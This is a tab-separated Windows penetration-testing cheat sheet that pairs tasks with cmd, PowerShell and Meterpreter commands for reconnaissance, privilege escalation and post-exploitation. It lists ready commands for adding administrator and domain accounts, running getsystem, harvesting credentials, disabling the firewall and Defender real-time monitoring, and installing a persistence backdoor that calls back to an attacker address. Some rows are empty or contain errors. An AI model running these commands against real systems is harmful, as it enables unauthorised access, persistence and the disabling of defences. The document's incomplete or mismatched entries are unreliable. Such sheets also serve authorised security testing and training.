Command Group	Task	Windows Command	Meterpreter Command	Comments
Information Gathering	Get System Information	systeminfo	sysinfo
Information Gathering	Get Current Directory	echo %cd%	pwd
Information Gathering	Get Current User	echo %username% or whoami	getuid
Information Gathering	Show Current User Privileges	whoami /priv	run post/windows/gather/win_privs
Information Gathering	Find a File or Service	where	search -h; -d for directory
Information Gathering	Show Running Services	wmic service list brief	run post/windows/gather/enum_services
Information Gathering	Show Installed Applications	net start	run post/windows/gather/enum_applications
Information Gathering	Show Process Tree	tasklist	ps
Information Gathering	Show Users' User Groups	net user username
Information Gathering	Check Windows Patching	wmic qfe get Caption,Description,HotFixID,InstalledOn
Information Gathering	Enumerate AD Domains	net view /domains or net group "Domain Controllers" domain	run post/windows/gather/enum_domains
Information Gathering	Enumerate AD Users	net user /domain	run post/windows/gather/enum_ad_users
Information Gathering	List Available Shares	net share	run post/windows/gather/enum_shares
Information Gathering	Show Computer Groups	net localgroup
Information Gathering	Show User Group Association	net localgroup groupname
Information Gathering	Show Logged On Users	From elevated PowerShell - Get-Process -IncludeUserName | Select-Object -Unique -Property UserName	run post/windows/gather/enum_logged_on_users	Note that "query user" works on Win10 Pro
Information Gathering	LDAP Enumeration	From Kali - nslookup -type=srv _ldap._tcp.els.bank | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g'
Network Mapping	Gather Network Interface Info	ipconfig /all	ifconfig
Network Mapping	Gather Routing Table Information	route print	route
Network Mapping	ARP Table Information	arp -a	arp
Network Mapping	Gather Network Connections	netstat -ano	netstat
Network Mapping	Show DNS Information	ipconfig /displaydns
Exploitation	Create New User (if privileged)	net user username password /add		Append /domain to modify domain account
Exploitation	Modify User Privileges	net localgroup "Administrators" username /add		Append /domain to modify domain account
Exploitation	Auto-Escalate Privileges		getsystem
Exploitation	Check Unquoted Service Paths	wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """
Exploitation	Check Service Status	sc query servicename
Exploitation	Check Auto Run Programs and Services	reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Exploitation	PrintNightmare	Multiple
Post-Exploitation	Gather Available Credentials	reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	run post/windows/gather/credentials/credential_collector	Also see Mimikatz
Post-Exploitation	Create New User with Admin Privileges	net user username password /add && net localgroup "administrators username /add
Post-Exploitation	Enable RDP on Machine	Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"	run getgui -e
Post-Exploitation	Check Firewall Status	netsh advfirewall show currentprofile
Post-Exploitation	Disable Firewall	netsh advfirewall set allprofiles state off
Post-Exploitation	Disable Antivirus	Powershell - Set-MpPreference -DisableRealtimeMonitoring $true
Post-Exploitation	Check Scheduled Tasks	schtasks /query /fo LIST /v
Post-Exploitation	Check AutoRun Programs and Services	reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Post-Exploitation	Persistent Back Door		run persistence -A -X -i 5 -p 8080 -r ipaddr
Post-Exploitation	Grant Admin Permissions to Directories	icacls Administrator\Desktop /grant james:(OI)(CI)F /T
Post-Exploitation	Autologin Credentials	reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
Post-Exploitation	FTP File Transfer	See notes
Post-Exploitation	Jenkins Reverse Shell
Exploitation	Responder/ntlmrelayx